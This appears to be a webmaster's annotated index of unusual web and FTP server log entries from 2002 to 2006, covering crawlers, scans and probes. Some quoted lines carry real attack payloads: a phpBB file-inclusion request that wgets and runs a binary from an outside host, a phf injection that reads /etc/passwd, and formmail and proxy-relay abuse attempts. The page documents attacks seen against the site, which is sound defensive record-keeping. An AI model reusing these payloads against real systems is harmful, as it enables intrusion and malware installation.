
Mystery Log Index


Requests probing for Mambo Serve vulnerabilities

Name:    69-56-146-210.theplanet.com
Address:  69.56.146.210

Requests probing for XMLRPC vulnerabilities

69.56.146.210 - - [01/Mar/2006:05:41:08 +0900] "POST /xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:09 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

phpMyAdmin

83.17.221.182 - - [21/Feb/2006:04:26:00 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 291 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:37:12 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 295 "-" "-"

ELF_KAIGENT.C

221.25.90.15 - - [20/Feb/2006:03:24:31 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.25.90.15 - - [20/Feb/2006:03:24:32 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

formmail

24.12.104.213 - - [12/Feb/2006:00:08:43 +0900] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"
24.12.104.213 - - [12/Feb/2006:00:47:59 +0900] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"

inazuma

pl1051.nas926.o-tokyo.nttpc.ne.jp - - [29/Dec/2003:02:00:39 +0900] "GET /mokko/w64_06.gif HTTP/1.1" 200 1838 "http://inazuma/content?Type=Data&KIND=&PARAM=&QUERY=網戸+張替え&WATCH=&EXTRA=&URL=http://iandu.s7.xrea.com/mokko/amido.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
pl1051.nas926.o-tokyo.nttpc.ne.jp - - [29/Dec/2003:02:00:39 +0900] "GET /mokko/arrowu_1.gif HTTP/1.1" 200 944 "http://inazuma/content?Type=Data&KIND=&PARAM=&QUERY=網戸+張替え&WATCH=&EXTRA=&URL=http://iandu.s7.xrea.com/mokko/amido.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

/_vti_bin/_vti_aut/author.exe

a212-113-164-98.netcabo.pt - - [27/Dec/2003:06:40:33 +0900] "POST /_vti_bin/_vti_aut/author.exe HTTP/1.0" 302 210 "-" "MSFrontPage/4.0"
a212-113-164-98.netcabo.pt - - [27/Dec/2003:06:40:33 +0900] "POST /_vti_bin/_vti_aut/author.exe HTTP/1.0" 302 210 "-" "MSFrontPage/4.0"

"Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)"

216.88.158.142 - - [25/Dec/2003:00:51:29 +0900] "GET /~genome/links.html HTTP/1.1" 200 6280 "-" "Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)"

backlinks.seguru.net

64.239.138.76 - - [25/Dec/2003:04:52:10 +0900] "GET / HTTP/1.1" 200 1427 "backlinks.seguru.net/?link-popularity" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.2.19; i686)"

When goo fetches your pages with Wget

202.229.44.68 - - [15/Dec/2003:10:48:13 +0900] "GET /%7Emyhome/index.html HTTP/1.0" 200 2506 "-" "Wget/1.8.2"

Why they look for usage/bookmarks

193.55.10.104 - - [02/Dec/2003:01:30:43 +0900] "GET /~ppp/pppkey.html HTTP/1.0" 200 3736 "bookmarks" "Mozilla/4.5 [fr] (Macintosh; U; PPC)"host)
133.39.9.117 - - [06/Dec/2003:18:56:15 +0900] "GET /%7Eggggg/index.html HTTP/1.0" 200 2080 "bookmarks" "Mozilla/4.7 [ja] (Macintosh; U; PPC)"

Browsers that put random strings in the UA

adsl-211-228-28.mia.bellsouth.net - - [22/Nov/2003:15:47:54 +0900] "GET /unimama/logwatch.html HTTP/1.1" 200 101684 "-" "nyuspswpddxWmuskco dityxp"
adsl-211-228-28.mia.bellsouth.net - - [22/Nov/2003:17:56:16 +0900] "GET /unimama/logwatch.html HTTP/1.1" 200 101684 "-" "leymisgaoVmjsnxb lbmocpsiqsaVi"

HEAD /xyzzy

wooster.netcraft.com - - [19/Nov/2003:22:30:51 +0900] "HEAD / HTTP/1.1" 200 0 "http://www.netcraft.com/survey/" "Mozilla/4.0  (compatible; Netcraft Web Server Survey)"
wooster.netcraft.com - - [19/Nov/2003:22:30:55 +0900] "HEAD /xyzzy HTTP/1.0" 302 0 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"

Search engine spam targeting reverse access log rankings

141.85.3.130 - - [17/Nov/2003:04:34:29 +0900] "GET / HTTP/1.0" 200 955 "http://www.saulem.com/" "MSIE 6.0"
141.85.3.130 - - [17/Nov/2003:11:10:10 +0900] "GET / HTTP/1.0" 200 955 "http://www.bongohome.com/" "MSIE 6.0"

FunWebProducts

195.93.32.8 - - [17/Nov/2003:00:59:35 +0900] "GET /~tttt/html/TT5.dmel0.mas.135.html HTTP/1.0" 200 2912 "XXXX:++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" "Mozilla/4.0 (compatible; MSIE 5.5; AOL 8.0; Windows NT 5.0; FunWebProducts)" 

Probably just a coincidence, but

Nov 17 11:43:15 myhost ftpd[25380]: FTPD: connection from defense-4-81-57-92-161.fbx.proxa at Mon Nov 17 11:43:15 2003
Nov 17 11:43:15 myhost ftpd[25380]: <--- 220 

Even though it isn't theirs

219.117.176.252 - - [16/Nov/2003:00:21:50 +0900] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery" 
219.117.176.252 - - [16/Nov/2003:00:21:50 +0900] "OPTIONS /%7Eppp HTTP/1.1" 301 322 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery" 

Why do search engines look for usage/bookmarks?

216.39.48.112 - - [25/Oct/2003:12:10:43 +0900] "GET /~ppp/usage/bookmarks HTTP/1.1" 404 301 "-" "Scooter/3.2"
64.68.82.170 - - [25/Oct/2003:19:19:10 +0900] "GET /~ppp/usage/bookmarks HTTP/1.0" 404 289 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

msnbot/0.11 (+http://search.msn.com/msnbot.htm)

204.95.98.252 - - [04/Nov/2003:04:04:04 +0900] "GET /%7Eggggg/mailto/:gggg-admin/@mydomain.xxx.xxx.xxx.xxx HTTP/1.0" 404 321 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"

Why us?

211.152.11.8 - - [02/Nov/2003:00:45:37 +0900] "GET /images2001/regobauble-b.gif HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 
211.152.11.8 - - [02/Nov/2003:01:43:45 +0900] "GET /images2001/clear.gif HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 

ten.com

No, not like that...

128.255.116.124 - - [09/Oct/2003:01:30:44 +0900] "GET /~ppp/cgi-bin/PPP/PPPseqen.pl.cgi?A900534 > PPP_SEQUENCES/A900534.txt" 400 377 "-" "-" 
128.255.116.124 - - [09/Oct/2003:01:30:44 +0900] "GET /~ppp/cgi-bin/PPP/PPPseqen.pl.cgi?A900756 > PPP_SEQUENCES/A900756.txt" 400 377 "-" "-" 

First time I've seen this one: mkd _K4e

Oct  8 23:57:25 myhost ftpd[12560]: FTPD: connection from pD9E40E3F.dip.t-dialin.net at Wed Oct  8 23:57:25 2003
Oct  8 23:57:25 myhost ftpd[12560]: <--- 220 

Look, I keep telling you, it was blocked

203.162.167.98 - - [02/Oct/2003:14:18:16 +0900] "GET /unimama/httpscan.txt HTTP/1.0" 200 30853 "http://www.google.com.vn/search?q=PDG_Cart/order.log&hl=vi&lr=&ie=UTF-8&start=70&sa=N" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
203.162.167.98 - - [02/Oct/2003:14:19:34 +0900] "GET /cgi-bin/adpassword.txt HTTP/1.0" 302 210 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

/jf74kd

217.187.217.152 - - [30/Sep/2003:13:35:20 +0900] "GET /jf74kd HTTP/1.0" 404 278 "-" "-"

internal-gopher-xxxxx

Sep 30 06:11:39 myhost ftpd[9226]: FTPD: connection from gate2.sssss.org at Tue Sep 30 06:11:39 2003
Sep 30 06:11:39 myhost ftpd[9226]: <--- 220 

A curious combination

210.51.181.114 - - [06/Sep/2003:16:12:55 +0900] "\x04\x01" 501 - "-" "-" 
210.51.181.114 - - [06/Sep/2003:16:13:15 +0900] "\x05\x01" 501 - "-" "-" 

Scan script

212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-" 
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-" 

Pages that confuse IE's character encoding detection

219.140.57.34 - - [30/Aug/2003:11:36:49 +0900] "GET /+AH4-ggg/cgi-bin/IMG/lblue.gif HTTP/1.1" 404 317 "http://mydomain.xxx.xxx.xxx/~ggg/cgi-bin/mas.pl.cgi?org=anab0&gene=icd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
219.140.57.34 - - [30/Aug/2003:11:36:49 +0900] "GET /+AH4-ggg/cgi-bin/IMG/blue.gif HTTP/1.1" 404 316 "http://mydomain.xxx.xxx.xxx/~ggg/cgi-bin/mas.pl.cgi?org=anab0&gene=icd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 

sitecheck.internetseer.com

66.150.40.66 - - [21/Aug/2003:02:11:37 +0900] "HEAD / HTTP/1.1" 200 0 "-" "sitecheck.internetseer.com (For more info see: http://sitecheck.internetseer.com)"
66.150.40.76 - - [19/Aug/2003:16:30:53 +0900] "GET /robots.txt HTTP/1.1" 200 187 "-" "sitecheck.internetseer.com (For more info see: http://sitecheck.internetseer.com)"

"GET /NULL.printer"

24.123.170.99 - - [08/Aug/2003:07:27:47 +0900] "GET /NULL.printer" 404 - "-" "-"

Search engine spam exploiting Webalizer? (2)

212.123.66.62 - - [04/Aug/2003:12:56:10 +0900] "GET /~ppp/usage/usage_200307.html HTTP/1.1" 200 0 "http://www.top-penis-enlargement.com/" "Mozilla/2.0 (compatible; MSIE 3.0; AOL 4.0; Windows 3.1)"
211.114.118.254 - - [04/Aug/2003:12:57:50 +0900] "GET /~ppp/usage/usage_200307.html HTTP/1.0" 200 0 "http://www.top-penis-enlargement.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

Search engine spam exploiting Webalizer?

A strange robot

210.155.159.198 - - [05/Aug/2003:13:46:54 +0900] "GET /~ggggg/ftp.embl-ebi.ac.uk/pub/databases/ HTTP/1.0" 404 313 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)" 

Tunneling attempts

12.218.107.176 - - [04/Aug/2003:18:28:57 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-" 
12.218.107.176 - - [04/Aug/2003:18:28:59 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-" 

A strange robot?

61.214.65.109 - - [31/Jul/2003:20:54:12 +0900] "GET /sssss~/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
61.214.65.109 - - [31/Jul/2003:20:55:41 +0900] "GET /sssss~pub/ HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

"GET /scripts/nsiislog.dll" - attack targeting the MS03-019 vulnerability

211.181.212.10 - - [16/Jul/2003:08:56:32 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
80.139.104.127 - - [21/Jul/2003:10:47:04 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"

Robot with a spoofed UA

66.237.60.61 - - [25/Jul/2003:16:02:00 +0900] "GET /robots.txt HTTP/1.0" 200 187 "-" "Gaisbot/3.0+(robot@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
66.237.60.61 - - [25/Jul/2003:20:16:29 +0900] "GET /&quot;&gt; HTTP/1.0" 404 290 "-" "Gaisbot/3.0+(robot@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"

Scan by Nikto/1.30

212.92.77.254 - - [24/Jul/2003:01:31:16 +0900] "GET / HTTP/1.1" 200 3923 "-" "libwhisker/1.6"
212.92.77.254 - - [24/Jul/2003:01:31:17 +0900] "GET /Nikto-1.30-nexWS82JrkAwEdao7u.htm HTTP/1.1" 404 317 "-" "Mozilla/4.75 (Nikto/1.30 )"

proxy judge

142.177.228.186 - - [22/Jul/2003:17:28:26 +0900] "GET http://blackmarket.jp/cgi-bin/jeno/env/prxjdg.cgi HTTP/1.0" 404 299 "-" "Mozilla/3.0 (compatible)" 
142.177.228.186 - - [22/Jul/2003:22:59:30 +0900] "GET http://blackmarket.jp/cgi-bin/jeno/env/prxjdg.cgi HTTP/1.0" 404 299 "-" "Mozilla/3.0 (compatible)"

Probing for PHP scripts

217.162.194.164 - - [17/Jul/2003:21:42:02 +0900] "GET / HTTP/1.0" 200 3923 "-" "-" 
217.162.194.164 - - [17/Jul/2003:21:42:05 +0900] "GET /index.php HTTP/1.0" 404 281 "-" "-" 

Why does it switch?

Jul 20 06:35:25 myhost in.ftpd[5713]: connect from 80.178.5.154
Jul 20 06:35:36 myhost in.ftpd[5716]: connect from 80.178.5.154.forward.012.net.il

"CONNECT 1.3.3.7:1337 HTTP/1.0"

210.196.71.179 - - [15/Jul/2003:13:46:52 +0900] "CONNECT 1.3.3.7:1337 HTTP/1.0" 405 309 "-" "-"

"GET //r/n. HTTP/1.1"

61.209.171.119 - - [30/Jun/2003:20:32:58 +0900] "GET //r/n. HTTP/1.1" 404 286 "-" "Microsoft URL Control - 6.00.8862"

"LINK / HTTP/1.1"

163.152.159.70 - - [27/Jun/2003:20:47:39 +0900] "LINK / HTTP/1.1" 501 337 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"
163.152.159.70 - - [28/Jun/2003:12:56:09 +0900] "LINK / HTTP/1.1" 501 337 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"

"GET /w3c/p3p.xml HTTP/1.1"

"GET /w3c/p3p.xml HTTP/1.1" 404 295 "-" "P3P Client" 

"GET /cfdocs/expeval/ExprCalc.cfm" - attack targeting a Cold Fusion sample script

212.202.40.10 - - [26/Jun/2003:07:10:26 +0900] "GET /cfdocs/expeval/ExprCalc.cfm HTTP/1.0" 404 299 "-" "-"

Attacks targeting mail-sending scripts

211.233.27.208 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.cgi HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"
192.148.139.178 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.asp HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"

"SEARCH / HTTP/1.1"

203.15.69.139 - - [24/Jun/2003:07:17:12 +0900] "SEARCH / HTTP/1.1" 501 344 "-" "-"

Attack using a password list

Jun 22 09:44:47 myhost ftpd[24002]: FTPD: connection from APlessis-Bouchard-101-2-1-53.w19 at Sun Jun 22 09:44:47 2003
Jun 22 09:44:47 myhost ftpd[24002]: <--- 220 

Doesn't seem to be a prank, but

131.107.163.50 - - [01/May/2003:13:57:18 +0900] "GET /~ggg-old/xxxxxx HTTP/1.1" 404 304 "-" "MicrosoftPrototypeCrawler (How's my crawling? mailto:newbiecrawler@hotmail.com)" 
131.107.163.50 - - [01/May/2003:13:57:23 +0900] "GET /~ggg-old/yyyyyy HTTP/1.1" 404 304 "-" "MicrosoftPrototypeCrawler (How's my crawling? mailto:newbiecrawler@hotmail.com)" 

A persistent scan

217.227.77.239 - - [30/Mar/2003:00:11:55 +0900] "HEAD / HTTP/1.0" 200 0 "-" "-" 
217.227.77.239 - - [30/Mar/2003:00:11:56 +0900] "GET /.pl HTTP/1.0" 404 275 "-" "-" 

They've got it wrong

218.68.216.7 - - [25/Feb/2003:08:50:09 +0900] "GET http://cancerres.aacrjournals.org/cgi/content/full/63/2/541 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Windows 98)"
218.68.216.7 - - [25/Feb/2003:12:49:06 +0900] "GET http://cancerres.aacrjournals.org/cgi/content/full/63/2/541 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Windows 98)"

anonymous@ftp.adobe.com

Feb 11 22:04:16 myhost ftpd[22755]: FTPD: connection from modemcable241.215-130-66.que.mc. at Tue Feb 11 22:04:16 2003
Feb 11 22:04:16 myhost ftpd[22755]: <--- 220 

Is this really Naver?

218.145.25.49 - - [31/Dec/2002:21:41:57 +0900] "GET /?action=ad HTTP/1.0" 200 915 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [31/Dec/2002:21:41:57 +0900] "GET /?action=faq HTTP/1.0" 200 915 "-" "dloader(NaverRobot)/1.0"

ano@ano.com

"GET x HTTP/1.0"

219.93.206.130 - - [26/Nov/2002:01:43:29 +0900] "GET x HTTP/1.0" 400 334 "-" "-"

Microsoft URL Control - 6.00.8862

211.110.6.220 - - [23/Nov/2002:18:08:13 +0900] "GET /ftp:/mydmain/pub/ppp HTTP/1.1" 404 315 "-" "Microsoft URL Control - 6.00.8862" 
211.110.6.220 - - [23/Nov/2002:18:08:56 +0900] "GET /~ppp/ftp:/mydomain/pub/ppp HTTP/1.1" 404 320 "-" "Microsoft URL Control - 6.00.8862"

"-" 408 - "-" "-"

66.196.72.79 - - [09/Sep/2002:06:43:29 +0900] "-" 408 - "-" "-"
66.196.73.76 - - [09/Sep/2002:08:47:09 +0900] "-" 408 - "-" "-"

msadcs.dll

208.203.70.195 - - [08/Nov/2002:10:56:37 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-" 
208.203.70.195 - - [08/Nov/2002:10:56:38 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-"

Pub Maker

Nov 10 14:05:20 myhost ftpd[22995]: FTPD: connection from pc-outside.uni-greifswald.de at Sun Nov 10 14:05:20 2002
Nov 10 14:05:20 myhost ftpd[22995]: <--- 220 

ano@ano.com go

Mr. Clingy

@here.com

Oct 25 03:22:54 myhost ftpd[24850]: FTPD: connection from ca-bordeaux-13-232.abo.wanadoo.f at Fri Oct 25 03:22:54 2002
Oct 25 03:22:54 myhost ftpd[24850]: <--- 220 

sss@

Oct 10 23:51:59 myhost ftpd[2723]: FTPD: connection from 213.226.134.110 at Thu Oct 10 23:51:59 2002
Oct 10 23:51:59 myhost ftpd[2723]: <--- 220 

This time it's mailto.exe

217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /scripts/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/scripts/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /cgi-bin/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/cgi-bin/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

How unusual!!

130.34.78.86 - - [20/Sep/2002:11:29:35 +0900] "GET /~ggggg/favicon.ico HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 
130.34.78.86 - - [20/Sep/2002:11:29:35 +0900] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

ano ano com go

Sep 19 02:15:35 myhost ftpd[2300]: FTPD: connection from pD951ED19.dip.t-dialin.net at Thu Sep 19 02:15:35 2002

formmail again

80.3.64.5 - - [19/Sep/2002:06:54:41 +0900] "HEAD /cgi-bin/formmail.pl HTTP/1.0" 404 0 "http://mydomain/" "-" 
80.3.64.5 - - [19/Sep/2002:06:54:42 +0900] "HEAD /cgi-bin/formmail.cgi HTTP/1.1" 404 0 "http://mydomain/" "-"

Isn't that bad manners?

211.101.4.15 - - [16/Sep/2002:03:11:51 +0900] "GET /?action=signup HTTP/1.1" 302 298 "-" "Internet Explore 5.x"
211.101.4.15 - - [16/Sep/2002:03:11:51 +0900] "GET /?action=spec HTTP/1.1" 302 298 "-" "Internet Explore 5.x"

Why us???

68.51.199.14 - - [12/Sep/2002:08:36:15 +0900] "GET /f.sb.gif HTTP/1.1" 404 292 "http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=365318a02b1caf1a79d75a731f7ec54c&msg=MSG1031786230.22&start=806672&len=2698" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 

Forged referer

209.142.168.7 - - [11/Sep/2002:08:22:25 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291 "http://gib.genes.nig.ac.jp/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
209.142.168.7 - - [11/Sep/2002:08:22:29 +0900] "GET / HTTP/1.0" 200 3906 "http://mydomain/cgi-bin/formmail.pl" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"

Footprints of SuperScan

Sep  6 06:05:46 myhost ftpd[22667]: FTPD: connection from 217.172.194.74 at Fri Sep  6 06:05:46 2002
Sep  6 06:05:46 myhost ftpd[22667]: <--- 220 

FrontPage2000 vulnerability

Oh, NaverRobot...

218.145.63.93 - - [06/Sep/2002:20:39:21 +0900] "GET /~7Eggggg/ HTTP/1.0" 404 282 "-" "dloader(NaverRobot)/1.0" 

Curious?

ps.melco.co.jp - - [27/Aug/2002:14:24:27 +0900] "GET /spec/server.html HTTP/1.0" 200 2258 "http://www.google.co.jp/search?q=CD-R+CD-RW+Windows2000+Server&hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&start=100&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0; .NET CLR 1.0.3705)"

We do not provide a proxy service

158.252.215.43 - - [21/Aug/2002:00:34:24 +0900] "CONNECT mx2.mail.yahoo.com:25 HTTP/1.0" 405 309 
213.37.58.178 - - [21/Aug/2002:15:35:52 +0900] "GET http://mytest.maddock.net/cgi-bin/myinfo HTTP/1.1" 404 298

While I was off for the Obon holidays... attack no. 2

While I was off for the Obon holidays... attack no. 1

Search

"GET /unimama/download.html HTTP/1.1" 200 4084 "http://apple.excite.co.jp/search.gw?target=combined&look=applejp_jp&lang=all&search=Stufflt+Expandar&pref=all" 

Solved: 408

No idea (2)

66.28.250.173 - - [26/Jul/2002:01:53:35 +0900] "GET /robots.txt HTTP/1.0" 200 187
66.28.250.173 - - [26/Jul/2002:01:53:35 +0900] "GET /&quot HTTP/1.0" 404 281

formmail follow-up

64.48.129.24 - - [15/Jul/2002:08:03:15 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291
64.48.129.24 - - [15/Jul/2002:08:03:19 +0900] "POST /cgi-bin/formmail.cgi HTTP/1.0" 404 292

It even passes along the handset model name

[09/Jul/2002:10:02:17 +0900] "GET / HTTP/1.0" 200 339 "-" "DoCoMo/1.0/N503i/c10"

Apparently not only IE but NN7 as well now requests favicon.ico

[09/Jul/2002:00:25:19 +0900] "GET /favicon.ico HTTP/1.1" 302 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1"

No idea

65.116.145.138 - - [18/Apr/2002:03:13:17 +0900] "GET /%2016945926%2010000%202157 HTTP/1.1" 404 303 
65.116.145.138 - - [18/Apr/2002:03:16:41 +0900] "GET /%20185464%2010000%2028 HTTP/1.1" 404 296 

Apparently formmail.pl/formmail.cgi has a security hole

24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.pl?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.pl&body=JupZ&email=srt@aol.com HTTP/1.1" 404 300
24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.cgi?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.cgi&body=JupZ&email=mim@aol.com HTTP/1.1" 404 301

What, just like that...

anonymous@ftp.microsoft.com follow-up

Stepping-stone attack?

Mar 10 06:23:37 myhost ftpd[3735]: FTPD: connection from modemcable091.124-202-24.mtl.mc. at Sun Mar 10 06:23:37 2002
Mar 10 06:23:37 myhost ftpd[3735]: <--- 220 

Finally figured out??? "GET /_vti_bin/owssvr.dll", "GET /MSOffice/cltreq.asp"

"GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290
"GET /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290

Why would anyone do this?

"GET /pub/ppp HTTP/1.0" 404 278
"GET /pub/ppp HTTP/1.0" 404 278

Be careful

"GET /phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 274

A new one? I thought so, but it appears to be CodeRed.

"GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290

What are they doing?

"GET x HTTP/1.0" 400 333

It is surely meant to be '~' (tilde), but what do you have to do to end up with this?

"GET /%E2%80%BEfoo/tools2.html HTTP/1.0" 404 290

A mysterious (probably) robot that has been showing up lately?

"-" 408 -

Found a strange log entry

"..." 501 -
"GET HTTP://www.microsoft.com/ HTTP/1.0" 200 3895 (unknown host)

Not a mystery, but... an acquaintance of mine who can't type a tilde

"GET /%EF%BD%9Emydir/zenkoku.html HTTP/1.1" 404 305
"GET /%EF%BD%9Emydir/zenkoku.html HTTP/1.1" 404 305

